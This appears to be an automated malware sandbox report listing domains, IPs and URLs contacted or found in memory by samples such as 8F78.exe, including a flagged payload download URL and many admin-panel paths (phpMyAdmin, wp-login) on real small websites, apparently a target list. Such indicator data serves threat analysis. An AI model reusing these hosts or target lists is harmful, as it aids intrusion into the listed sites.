                                http://sluchatka.sk/phpMyAdmin/0%Avira URL Cloudsafe
                                http://feio.jp/phpmyadmin/ma/k0%Avira URL Cloudsafe
                                http://emmetisportfun.it/N0%Avira URL Cloudsafe
                                https://feio.jp/phpmyadmin/e0%Avira URL Cloudsafe
                                http://detmar.sk/0%Avira URL Cloudsafe
                                http://eurokamen.sk/wp-login.php0%Avira URL Cloudsafe
                                http://fermatsk.sk/kbkk.com0%Avira URL Cloudsafe
                                https://enso-center.org/phpmyadmin/a.justdave.net1430%Avira URL Cloudsafe
                                http://enso-center.org/adminyDB0%Avira URL Cloudsafe
                                https://eurokamen.sk/0%Avira URL Cloudsafe
                                https://hu-manity.co/0%Avira URL Cloudsafe
                                http://ivory.plala.co.jp/administrator/index.php0%Avira URL Cloudsafe
                                http://clickbkk.com/admin.phpm0%Avira URL Cloudsafe
                                https://nakacho.com/wp-content/themes/crieinc1.0/js/jquery1.4.4.min.js0%Avira URL Cloudsafe
                                http://ericrothphoto.com/PhpMyAdmin/0%Avira URL Cloudsafe
                                http://dobrybicykel.sk/pma/in/0%Avira URL Cloudsafe
                                https://nakacho.com/wp-includes/css/dist/block-library/style.min.css?ver=6.3.20%Avira URL Cloudsafe
                                https://aloeveraforever.sk/phpmyadmin/r0%Avira URL Cloudsafe
                                http://eurisproagro.sk/V0%Avira URL Cloudsafe
                                http://clickbkk.com/pma/0%Avira URL Cloudsafe
                                http://crl.startssl.com/sca-code3.crl0#0%Avira URL Cloudsafe
                                https://erikamoveis.com.br/phpmyadmin/0%Avira URL Cloudsafe
                                http://s-kotobuki-s.co.jp/administrator/0%Avira URL Cloudsafe
                                http://brightright.com/phpmyadmin/0%Avira URL Cloudsafe
                                http://merlynsociety.com/0%Avira URL Cloudsafe
                                http://eluxviaggi.com/phpmyadmin/0%Avira URL Cloudsafe
                                http://sluchatka.sk/phpmyadmin/?0%Avira URL Cloudsafe
                                http://feio.jp/PhpMyAdmin/in/0%Avira URL Cloudsafe
                                dayfarrichjwclik.fun100%Avira URL Cloudmalware
                                http://eshopy-katalog.sk/admin.php0%Avira URL Cloudsafe
                                http://e-bicycles.eu/administrator/index.php0%Avira URL Cloudsafe
                                http://aloeveraforever.sk/0%Avira URL Cloudsafe
                                https://eurokamen.sk/predaj_sklad/0%Avira URL Cloudsafe
                                http://kanapy.sk/eshop0%Avira URL Cloudsafe
                                https://eurisproagro.sk/phpmyadmin/0%Avira URL Cloudsafe
                                http://kanapy.sk/administrator/0%Avira URL Cloudsafe
                                http://nippondotech.co.jp/0%Avira URL Cloudsafe
                                http://sluchatka.sk/pma/0%Avira URL Cloudsafe
                                https://nakacho.com/wp-includes/js/mediaelement/wp-mediaelement.min.css?ver=6.3.20%Avira URL Cloudsafe
                                http://straznyanjel.sk/wp-login.php/index.php0%Avira URL Cloudsafe
                                http://khi-ho.ne.jp/phpmyadmin/0%Avira URL Cloudsafe
                                https://konic.co.jp/phpmyadmin/0%Avira URL Cloudsafe
                                https://nakacho.com/wp-content/uploads/2017/06/hed_otoiawase.png0%Avira URL Cloudsafe
                                http://elteconline.com/administrator/0%Avira URL Cloudsafe
                                http://merlynsociety.com/administrator/index.phpocalhost0%Avira URL Cloudsafe
                                https://nakacho.com/kakusyu_seido_ichiran/kaigai_kensyu/0%Avira URL Cloudsafe
                                http://eshopy-katalog.sk/administrator/9n/0%Avira URL Cloudsafe
                                http://oitacity.jp/administrator/0%Avira URL Cloudsafe
                                https://nakacho.com/wp-content/themes/crieinc1.0/bs/css/bootstrap.min.css0%Avira URL Cloudsafe
                                https://enso-center.org/phpmyadmin/a.justdave.net465I0%Avira URL Cloudsafe
                                http://khi-ho.ne.jp/pma/0%Avira URL Cloudsafe
                                https://st-comet.com/phpmyadmin/0%Avira URL Cloudsafe
                                https://abatek.sk/phpmyadmin/0%Avira URL Cloudsafe
                                http://konic.co.jp/PhpMyAdmin/0%Avira URL Cloudsafe
                                http://tsutomu.com/administrator/0%Avira URL Cloudsafe
                                https://gabio.sk/phpmyadmin/0%Avira URL Cloudsafe
                                http://detmar.sk/administrator/index.php0%Avira URL Cloudsafe
                                https://kanapy.sk/eshop/0%Avira URL Cloudsafe
                                http://e-art-studio.co.jp/phpMyAdmin/Z0%Avira URL Cloudsafe
                                NameIPActiveMaliciousAntivirus DetectionReputation
                                izberatel.sk
                                81.0.206.104
                                truetrueunknown
                                inhodinky.sk
                                85.248.129.35
                                truetrueunknown
                                tsutomu.com
                                64.190.63.111
                                truetrueunknown
                                cream.hitsturbo.com
                                104.21.46.59
                                truetrueunknown
                                lightseinsteniki.org
                                34.143.166.163
                                truetrueunknown
                                magokorokan.com
                                157.205.193.125
                                truefalseunknown
                                mx.emmetisportfun.it
                                62.149.128.157
                                truefalse
                                  unknown
                                  mail.st-comet.com
                                  164.46.93.189
                                  truetrue
                                    unknown
                                    janckulik.sk
                                    193.163.77.6
                                    truefalseunknown
                                    mxi.alpha-prm.jp
                                    157.205.8.22
                                    truefalse
                                      high
                                      abatek.sk
                                      46.229.230.4
                                      truetrueunknown
                                      gw2.mx.anafra.net
                                      185.32.160.2
                                      truefalse
                                        unknown
                                        s-kotobuki-s.co.jp
                                        164.46.121.63
                                        truetrueunknown
                                        eurokamen.sk
                                        92.240.253.3
                                        truetrueunknown
                                        keramat.sk
                                        172.67.152.228
                                        truefalseunknown
                                        escolapatelli.com.br
                                        50.116.86.49
                                        truetrueunknown
                                        erikamoveis.com.br
                                        187.45.195.138
                                        truefalseunknown
                                        predan.it
                                        89.46.109.48
                                        truetrueunknown
                                        ftp.eshopy-katalog.sk
                                        141.98.102.194
                                        truetrue
                                          unknown
                                          www.sport-tour.sk
                                          178.238.43.210
                                          truefalseunknown
                                          ampub04.alpha-mail.net
                                          216.230.254.4
                                          truetrueunknown
                                          mail.inhodinky.sk
                                          37.9.175.8
                                          truefalse
                                            unknown
                                            hdr-nlb7-aebd5d615260636b.elb.us-east-1.amazonaws.com
                                            54.161.222.85
                                            truefalse
                                              high
                                              mailhost01.rkd.sk
                                              62.168.119.84
                                              truetrueunknown
                                              sport-tour.sk
                                              178.238.43.210
                                              truefalse
                                                unknown
                                                gw1.mx.anafra.net
                                                77.93.220.102
                                                truetrueunknown
                                                c1.webareal.sk
                                                81.0.206.104
                                                truefalse
                                                  high
                                                  www.predan.it
                                                  89.46.109.48
                                                  truetrueunknown
                                                  stualialuyastrelia.net
                                                  91.215.85.17
                                                  truetrue
                                                    unknown
                                                    nakupusa.cz
                                                    93.184.77.21
                                                    truefalseunknown
                                                    useron17.hostmaster.sk
                                                    46.229.230.40
                                                    truefalse
                                                      unknown
                                                      pop3.nakacho.com
                                                      162.43.104.145
                                                      truetrue
                                                        unknown
                                                        humydrole.com
                                                        180.94.156.61
                                                        truetrue
                                                          unknown
                                                          mail.emmetisportfun.it
                                                          62.149.128.74
                                                          truefalse
                                                            unknown
                                                            preda.pl
                                                            89.161.228.119
                                                            truetrue
                                                              unknown
                                                              elrocket.com
                                                              217.26.54.21
                                                              truetrue
                                                                unknown
                                                                st-comet.com
                                                                164.46.93.189
                                                                truetrue
                                                                  unknown
                                                                  shpilliwilli.com
                                                                  104.21.45.142
                                                                  truetrue
                                                                    unknown
                                                                    email.eshopy-katalog.sk
                                                                    141.98.102.194
                                                                    truetrue
                                                                      unknown
                                                                      aexoden.com
                                                                      23.239.22.202
                                                                      truefalse
                                                                        unknown
                                                                        brightright.com
                                                                        68.233.46.109
                                                                        truetrue
                                                                          unknown
                                                                          mx1.webhouse.sk
                                                                          93.184.77.232
                                                                          truefalse
                                                                            high
                                                                            www.elteconline.com
                                                                            86.107.32.130
                                                                            truetrue
                                                                              unknown
                                                                              roland-sk.sk
                                                                              93.185.102.224
                                                                              truefalse
                                                                                unknown
                                                                                mx3.webhouse.sk
                                                                                46.229.230.21
                                                                                truefalse
                                                                                  high
                                                                                  td-ccm-neg-87-45.wixdns.net
                                                                                  34.149.87.45
                                                                                  truefalse
                                                                                    unknown
                                                                                    mx2.webhouse.sk
                                                                                    93.184.77.245
                                                                                    truefalse
                                                                                      high
                                                                                      nakacho.com
                                                                                      162.43.104.145
                                                                                      truetrue
                                                                                        unknown
                                                                                        mx.elteconline.com
                                                                                        62.149.128.72
                                                                                        truetrue
                                                                                          unknown
                                                                                          oitacity.jp
                                                                                          59.106.13.82
                                                                                          truetrue
                                                                                            unknown
                                                                                            instalanova.sk
                                                                                            92.240.253.14
                                                                                            truefalse
                                                                                              unknown
                                                                                              ftp.e-art-studio.co.jp
                                                                                              216.230.253.85
                                                                                              truefalse
                                                                                                unknown
                                                                                                relay3.dnsserver.eu
                                                                                                92.240.253.137
                                                                                                truefalse
                                                                                                  high
                                                                                                  bombertublestylebanws.fun
                                                                                                  104.21.13.14
                                                                                                  truefalse
                                                                                                    unknown
                                                                                                    e-art-studio.co.jp
                                                                                                    216.230.253.85
                                                                                                    truetrue
                                                                                                      unknown
                                                                                                      in1-smtp.messagingengine.com
                                                                                                      103.168.172.219
                                                                                                      truetrue
                                                                                                        unknown
                                                                                                        relay.exohosting.sk
                                                                                                        92.240.253.136
                                                                                                        truetrue
                                                                                                          unknown
                                                                                                          pop3-imap.dnsserver.eu
                                                                                                          92.240.253.45
                                                                                                          truefalse
                                                                                                            high
                                                                                                            mx.a.locaweb.com.br
                                                                                                            186.202.4.42
                                                                                                            truetrue
                                                                                                              unknown
                                                                                                              mailin1.aloeveraforever.sk
                                                                                                              45.13.137.8
                                                                                                              truetrue
                                                                                                                unknown
                                                                                                                mailin1.inhodinky.sk
                                                                                                                37.9.169.113
                                                                                                                truefalse
                                                                                                                  unknown
                                                                                                                  relay1.exohosting.sk
                                                                                                                  92.240.253.137
                                                                                                                  truefalse
                                                                                                                    unknown
                                                                                                                    predajpaliet.sk
                                                                                                                    83.167.249.7
                                                                                                                    truetrue
                                                                                                                      unknown
                                                                                                                      mail.ericrothphoto.com
                                                                                                                      35.190.10.69
                                                                                                                      truefalse
                                                                                                                        unknown
                                                                                                                        emmetisportfun.it
                                                                                                                        89.46.109.20
                                                                                                                        truetrue
                                                                                                                          unknown
                                                                                                                          useron15.hostmaster.sk
                                                                                                                          46.229.230.4
                                                                                                                          truetrue
                                                                                                                            unknown
                                                                                                                            mail.escolapatelli.com.br
                                                                                                                            50.116.86.49
                                                                                                                            truetrue
                                                                                                                              unknown
                                                                                                                              rotas.sk
                                                                                                                              46.229.230.81
                                                                                                                              truetrue
                                                                                                                                unknown
                                                                                                                                mailgate.inhodinky.sk
                                                                                                                                85.248.129.36
                                                                                                                                truefalse
                                                                                                                                  unknown
                                                                                                                                  ax-sk1-mx4.ignum.eu
                                                                                                                                  62.109.128.119
                                                                                                                                  truetrue
                                                                                                                                    unknown
                                                                                                                                    server1.floxm.com
                                                                                                                                    178.238.40.161
                                                                                                                                    truefalse
                                                                                                                                      unknown
                                                                                                                                      mx2.hostcreators.sk
                                                                                                                                      217.61.3.26
                                                                                                                                      truetrue
                                                                                                                                        unknown
                                                                                                                                        mail.cesys.eu
                                                                                                                                        178.238.43.196
                                                                                                                                        truefalse
                                                                                                                                          unknown
                                                                                                                                          www.inhodinky.sk
                                                                                                                                          85.248.129.36
                                                                                                                                          truefalse
                                                                                                                                            unknown
                                                                                                                                            emr.com.ar
                                                                                                                                            66.97.32.25
                                                                                                                                            truetrue
                                                                                                                                              unknown
                                                                                                                                              elteconline.com
                                                                                                                                              86.107.32.130
                                                                                                                                              truetrue
                                                                                                                                                unknown
                                                                                                                                                useron22.hostmaster.sk
                                                                                                                                                46.229.230.106
                                                                                                                                                truefalse
                                                                                                                                                  unknown
                                                                                                                                                  ftpvoyager.cc
                                                                                                                                                  2.180.10.7
                                                                                                                                                  truetrue
                                                                                                                                                    unknown
                                                                                                                                                    mail.fermatsk.sk
                                                                                                                                                    212.57.35.59
                                                                                                                                                    truefalse
                                                                                                                                                      unknown
                                                                                                                                                      eshopy-katalog.sk
                                                                                                                                                      141.98.102.194
                                                                                                                                                      truetrue
                                                                                                                                                        unknown
                                                                                                                                                        zimbra.justdave.net
                                                                                                                                                        173.255.193.246
                                                                                                                                                        truetrue
                                                                                                                                                          unknown
                                                                                                                                                          elossa.de
                                                                                                                                                          217.160.223.67
                                                                                                                                                          truetrue
                                                                                                                                                            unknown
                                                                                                                                                            ssh.justdave.net
                                                                                                                                                            173.236.212.211
                                                                                                                                                            truefalse
                                                                                                                                                              unknown
                                                                                                                                                              www.sluchatka.sk
                                                                                                                                                              85.248.130.200
                                                                                                                                                              truefalse
                                                                                                                                                                unknown
                                                                                                                                                                mail.s-kotobuki-s.co.jp
                                                                                                                                                                164.46.121.63
                                                                                                                                                                truetrue
                                                                                                                                                                  unknown
                                                                                                                                                                  mailin1.kanapy.sk
                                                                                                                                                                  45.13.137.7
                                                                                                                                                                  truetrue
                                                                                                                                                                    unknown
                                                                                                                                                                    fosse.virtualhosting.hk
                                                                                                                                                                    103.19.26.39
                                                                                                                                                                    truetrue
                                                                                                                                                                      unknown
                                                                                                                                                                      kanapy.sk
                                                                                                                                                                      37.9.175.180
                                                                                                                                                                      truefalse
                                                                                                                                                                        unknown
                                                                                                                                                                        liuliuoumumy.org
                                                                                                                                                                        34.143.166.163
                                                                                                                                                                        truetrue
                                                                                                                                                                          unknown
                                                                                                                                                                          e-bicycles.eu
                                                                                                                                                                          62.109.151.15
                                                                                                                                                                          truetrue
                                                                                                                                                                            unknown
                                                                                                                                                                            neighborhoodfeelsa.fun
                                                                                                                                                                            172.67.143.130
                                                                                                                                                                            truetrue
                                                                                                                                                                              unknown
                                                                                                                                                                              ericrothphoto.com
                                                                                                                                                                              35.190.10.69
                                                                                                                                                                              truefalse
                                                                                                                                                                                unknown
                                                                                                                                                                                rotas-sk.mail.protection.outlook.com
                                                                                                                                                                                104.47.17.74
                                                                                                                                                                                truefalse
                                                                                                                                                                                  high
                                                                                                                                                                                  linkofstrumble.com
                                                                                                                                                                                  104.21.88.149
                                                                                                                                                                                  truetrue
                                                                                                                                                                                    unknown
                                                                                                                                                                                    justdave.net
                                                                                                                                                                                    173.236.212.211
                                                                                                                                                                                    truefalse
                                                                                                                                                                                      unknown
                                                                                                                                                                                      imap.inhodinky.sk
                                                                                                                                                                                      37.9.175.8
                                                                                                                                                                                      truefalse
                                                                                                                                                                                        unknown
                                                                                                                                                                                        profisign-sk.sk
                                                                                                                                                                                        93.185.102.224
                                                                                                                                                                                        truefalse
                                                                                                                                                                                          unknown
                                                                                                                                                                                          aloeveraforever.sk
                                                                                                                                                                                          37.9.175.188
                                                                                                                                                                                          truefalse
                                                                                                                                                                                            unknown
                                                                                                                                                                                            ssh.aloeveraforever.sk
                                                                                                                                                                                            37.9.175.188
                                                                                                                                                                                            truefalse
                                                                                                                                                                                              unknown
                                                                                                                                                                                              mail.emr.com.ar
                                                                                                                                                                                              66.97.32.25
                                                                                                                                                                                              truetrue
                                                                                                                                                                                                unknown
                                                                                                                                                                                                NameMaliciousAntivirus DetectionReputation
                                                                                                                                                                                                http://eshopy-katalog.sk/administrator/index.phptrue
                                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                                unknown
                                                                                                                                                                                                https://linkofstrumble.com/fe59b57390b3eb9c78ef311810f298a4/288c47bbc1871b439df19ff4df68f076.exetrue
                                                                                                                                                                                                • Avira URL Cloud: malware
                                                                                                                                                                                                unknown
                                                                                                                                                                                                http://tsutomu.com/PhpMyAdmin/true
                                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                                unknown
                                                                                                                                                                                                http://abatek.sk/wp-login.phptrue
                                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                                unknown
                                                                                                                                                                                                http://brightright.com/wp-login.phptrue
                                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                                unknown
                                                                                                                                                                                                http://tonimiuyaytre.org/true
                                                                                                                                                                                                • URL Reputation: safe
                                                                                                                                                                                                unknown
                                                                                                                                                                                                https://elrocket.com/phpmyadmin/true
                                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                                unknown
                                                                                                                                                                                                https://erikamoveis.com.br/phpmyadmin/false
                                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                                unknown
                                                                                                                                                                                                http://s-kotobuki-s.co.jp/administrator/true
                                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                                unknown
                                                                                                                                                                                                http://brightright.com/phpmyadmin/true
                                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                                unknown
                                                                                                                                                                                                dayfarrichjwclik.funtrue
                                                                                                                                                                                                • Avira URL Cloud: malware
                                                                                                                                                                                                unknown
                                                                                                                                                                                                http://e-bicycles.eu/administrator/index.phptrue
                                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                                unknown
                                                                                                                                                                                                http://kanapy.sk/eshopfalse
                                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                                unknown
                                                                                                                                                                                                https://eurisproagro.sk/phpmyadmin/false
                                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                                unknown
                                                                                                                                                                                                http://kanapy.sk/administrator/false
                                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                                unknown
                                                                                                                                                                                                http://elteconline.com/administrator/true
                                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                                unknown
                                                                                                                                                                                                http://www.kompresory-servis.sk/administrator/false
                                                                                                                                                                                                  high
                                                                                                                                                                                                  http://oitacity.jp/administrator/true
                                                                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                                                                  unknown
                                                                                                                                                                                                  https://st-comet.com/phpmyadmin/true
                                                                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                                                                  unknown
                                                                                                                                                                                                  https://abatek.sk/phpmyadmin/true
                                                                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                                                                  unknown
                                                                                                                                                                                                  http://tsutomu.com/administrator/true
                                                                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                                                                  unknown
                                                                                                                                                                                                  http://detmar.sk/administrator/index.phptrue
                                                                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                                                                  unknown
                                                                                                                                                                                                  https://kanapy.sk/eshop/false
                                                                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                                                                  unknown
                                                                                                                                                                                                  NameSourceMaliciousAntivirus DetectionReputation
                                                                                                                                                                                                  http://daxter.fsnet.co.uk/k8F78.exe, 00000007.00000002.3647175273.0000000003854000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                                                                  unknown
                                                                                                                                                                                                  https://aka.ms/odirmrexplorer.exe, 00000001.00000000.1699278229.00000000079FB000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    high
                                                                                                                                                                                                    http://abatek.sk/PhpMyAdmin/8F78.exe, 00000007.00000002.3672655759.0000000003D21000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                                    unknown
                                                                                                                                                                                                    http://kompresory-servis.sk/phpmyadmin/8F78.exe, 00000007.00000002.3754866218.0000000004238000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      high
                                                                                                                                                                                                      http://aloeveraforever.sk/r8F78.exe, 00000007.00000002.3647175273.0000000003854000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                                                      unknown
                                                                                                                                                                                                      http://aquamat-liptov.sk/phpMyAdmin/8F78.exe, 00000007.00000002.3648319405.000000000388A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                                                      unknown
                                                                                                                                                                                                      https://api.msn.com:443/v1/news/Feed/Windows?explorer.exe, 00000001.00000000.1699278229.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1700756289.00000000097D4000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        high
                                                                                                                                                                                                        https://themeisle.com8F78.exe, 00000007.00000002.3685374127.0000000003F53000.00000004.00000020.00020000.00000000.sdmp, 8F78.exe, 00000007.00000002.3754866218.0000000004200000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          high
                                                                                                                                                                                                          http://oitacity.jp/pma/8F78.exe, 00000007.00000002.3647175273.0000000003854000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          https://aloeveraforever.sk/phpmyadmin/D8F78.exe, 00000007.00000002.3754866218.0000000004264000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://crl.certum.pl/dvcasha2.crl0q8F78.exe, 00000007.00000002.3672655759.0000000003C82000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            high
                                                                                                                                                                                                            http://khi-ho.ne.jp/phpMyAdmin/w2G8F78.exe, 00000007.00000002.3672655759.0000000003D21000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                                                                            unknown
                                                                                                                                                                                                            http://ivory.plala.co.jp/8F78.exe, 00000007.00000002.3647175273.0000000003854000.00000004.00000020.00020000.00000000.sdmp, 8F78.exe, 00000007.00000002.3743164281.00000000040DA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                                                                            unknown
                                                                                                                                                                                                            https://eurokamen.sk/wp-content/plugins/contact-form-7/includes/js/index.js?ver=5.8.48F78.exe, 00000007.00000002.3685374127.0000000003F53000.00000004.00000020.00020000.00000000.sdmp, 8F78.exe, 00000007.00000002.3754866218.0000000004200000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                                                                            unknown
                                                                                                                                                                                                            http://feio.jp/phpmyadmin/ma/k8F78.exe, 00000007.00000002.3647175273.0000000003854000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                                                                            unknown
                                                                                                                                                                                                            http://sluchatka.sk/phpMyAdmin/8F78.exe, 00000007.00000002.3743164281.00000000040E9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                                                                            unknown
                                                                                                                                                                                                            http://emmetisportfun.it/N8F78.exe, 00000007.00000002.3743164281.00000000040DA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                                                                            unknown
                                                                                                                                                                                                            http://detmar.sk/8F78.exe, 00000007.00000002.3647175273.0000000003854000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                                                                            unknown
                                                                                                                                                                                                            http://kompresory-servis.sk/administrator/n8F78.exe, 00000007.00000002.3743164281.00000000040E9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              high
                                                                                                                                                                                                              https://feio.jp/phpmyadmin/e8F78.exe, 00000007.00000002.3647175273.0000000003854000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                                                              unknown
                                                                                                                                                                                                              http://fermatsk.sk/kbkk.com8F78.exe, 00000007.00000002.3672655759.0000000003CE5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                                                              unknown
                                                                                                                                                                                                              https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUYexplorer.exe, 00000001.00000000.1699278229.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                high
                                                                                                                                                                                                                http://eurokamen.sk/wp-login.php8F78.exe, 00000007.00000002.3648319405.000000000388A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                http://crl.startssl.com/sca-code3.crl0#A19A.exe, 00000008.00000003.2029883688.00000208D2DED000.00000004.00000020.00020000.00000000.sdmp, A19A.exe, 00000008.00000003.2030515756.00000208D2DED000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                https://enso-center.org/phpmyadmin/a.justdave.net1438F78.exe, 00000007.00000002.3648319405.00000000038AC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                http://enso-center.org/adminyDB8F78.exe, 00000007.00000002.3754866218.0000000004204000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                http://ivory.plala.co.jp/administrator/index.php8F78.exe, 00000007.00000002.3648319405.00000000038AC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                http://enp.ericsson.se/pma/8F78.exe, 00000007.00000002.3647175273.0000000003854000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  high
                                                                                                                                                                                                                  https://eurokamen.sk/8F78.exe, 00000007.00000002.3685374127.0000000003F53000.00000004.00000020.00020000.00000000.sdmp, 8F78.exe, 00000007.00000002.3754866218.0000000004200000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                  http://clickbkk.com/admin.phpm8F78.exe, 00000007.00000002.3743164281.00000000040E9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                  https://hu-manity.co/8F78.exe, 00000007.00000002.3685374127.0000000003F53000.00000004.00000020.00020000.00000000.sdmp, 8F78.exe, 00000007.00000002.3754866218.0000000004200000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                  https://nakacho.com/wp-content/themes/crieinc1.0/js/jquery1.4.4.min.js8F78.exe, 00000007.00000002.3685374127.0000000003DC3000.00000004.00000020.00020000.00000000.sdmp, 8F78.exe, 00000007.00000002.3672655759.0000000003C97000.00000004.00000020.00020000.00000000.sdmp, 8F78.exe, 00000007.00000002.3685374127.0000000003DFD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                  http://dobrybicykel.sk/pma/in/8F78.exe, 00000007.00000002.3672655759.0000000003CE5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                  http://ericrothphoto.com/PhpMyAdmin/8F78.exe, 00000007.00000002.3743164281.00000000040DA000.00000004.00000020.00020000.00000000.sdmp, 8F78.exe, 00000007.00000002.3648319405.000000000388A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                  https://nakacho.com/wp-includes/css/dist/block-library/style.min.css?ver=6.3.28F78.exe, 00000007.00000002.3685374127.0000000003DC3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                  http://eurisproagro.sk/V8F78.exe, 00000007.00000002.3672655759.0000000003CE5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                  https://aloeveraforever.sk/phpmyadmin/r8F78.exe, 00000007.00000002.3754866218.0000000004264000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                  http://clickbkk.com/pma/8F78.exe, 00000007.00000002.3672655759.0000000003CE5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                  http://www.autoitscript.com/autoit3/Jexplorer.exe, 00000001.00000000.1702956884.000000000C964000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    high
                                                                                                                                                                                                                    http://eluxviaggi.com/phpmyadmin/8F78.exe, 00000007.00000002.3648319405.00000000038AC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                    http://merlynsociety.com/8F78.exe, 00000007.00000002.3647175273.0000000003854000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                    http://sluchatka.sk/phpmyadmin/?8F78.exe, 00000007.00000002.3743164281.00000000040E9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                                                    unknown
